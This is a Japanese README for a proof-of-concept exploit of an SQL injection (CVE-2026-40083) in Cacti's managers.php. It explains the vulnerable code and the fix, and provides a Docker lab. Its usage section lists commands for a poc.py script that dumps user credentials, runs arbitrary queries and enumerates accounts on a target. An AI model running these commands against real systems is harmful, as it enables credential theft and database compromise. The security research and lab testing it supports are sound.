
CVE-2026-40083 の概念実証エクスプロイト。Cacti managers.php の SQL インジェクションで、認証されたユーザーが MySQL データベース、ユーザー資格情報、パスワードハッシュを抽出できます。テスト用の Docker ラボを含みます。
CVE-2026-40083 の概念実証エクスプロイトです。Cacti の managers.php に存在する SQL インジェクションの脆弱性を利用し、SNMP Manager 権限を持つ認証済みユーザーが MySQL データベース全体を読み取り、ユーザー資格情報やパスワードハッシュを取得することを可能にします。
使用方法:
# Verify injection (time-based)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin
# Dump specific user credentials
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1
# Extract arbitrary SQL query result
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"
# Enumerate all users (scan IDs 1-50)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50
# With Burp proxy
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080
managers.php では、selected_graphs_array からのユーザー入力が cacti_unserialize() によってアンシリアライズされ、サニタイズされずに直接 SQL にインプロードされます。
$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));
if ($selected_items != false) {
// No validation - direct implode into SQL
db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}
selected_graphs_array パラメータは PHP シリアル化された配列を受け入れます。配列要素はカンマで結合され、IN 句に直接注入されます。
POST /managers.php (action=actions, drp_action=1|2|3)
SQL インジェクションの脆弱性により、SNMP Manager 権限を持つ認証済みユーザーがデータベース上で任意のクエリを実行できます。これにより、ユーザーデータ、設定、デバイス資格情報、SNMP コミュニティを含むテーブルの読み取りや、bcrypt ハッシュや API トークンの抽出が可能になり、アカウントの侵害につながる可能性があります。さらに、この欠陥により時間遅延コマンドの実行が可能になり、データベース接続を使い果たしてサービス拒否を引き起こす可能性があります。
7.2 高 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
コミット 52032e760 により、array_map('intval', $selected_items) が implode の前に追加され、すべての値が整数にキャストされます。
docker-compose up -d --build
初期化に約30秒待ちます。http://localhost:8088 で Cacti にアクセスしてください。
デフォルトの資格情報: admin / admin
# Test exploit
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1
このツールは教育および研究目的のみに使用されます。所有しているシステム、または明示的なテスト許可があるシステムでのみ使用してください。作者は、このプログラムの誤用または損害について一切の責任を負いません。
QuimeraX Intelligence は、複雑なシステムにおける重大な脆弱性を特定することに特化した高度な EASM およびサイバー脅威インテリジェンスプラットフォームです。このプラットフォームは、セキュリティ脅威について積極的に監視、検出、警告し、透明性と潜在的なリスクへの迅速な対応を保証します。クライアントは、システムに脆弱性が発見された場合、即座に通知と包括的なレポートを受け取り、保護措置を講じることができます。詳細
Hakai Security は、セキュリティ専門家によって設立されたサイバーセキュリティ企業であり、技術的卓越性に取り組んでいます。高度なペネトレーションテスト、現実的なレッドチームシミュレーション、セキュアな開発プラクティスを含む、カスタマイズされたセキュリティソリューションを提供し、進化するサイバー脅威からクライアントの資産を積極的に保護します。
Hacking Club は、セキュリティコンサルティング会社で働くエキスパートが作成した実践的なレッスン、ラボ、チャレンジを通じてサイバーセキュリティを学ぶトレーニングプラットフォームです。現場から直接トレーニングへ。このリポジトリで紹介されている脆弱性をハッキングクラブで練習しましょう!詳細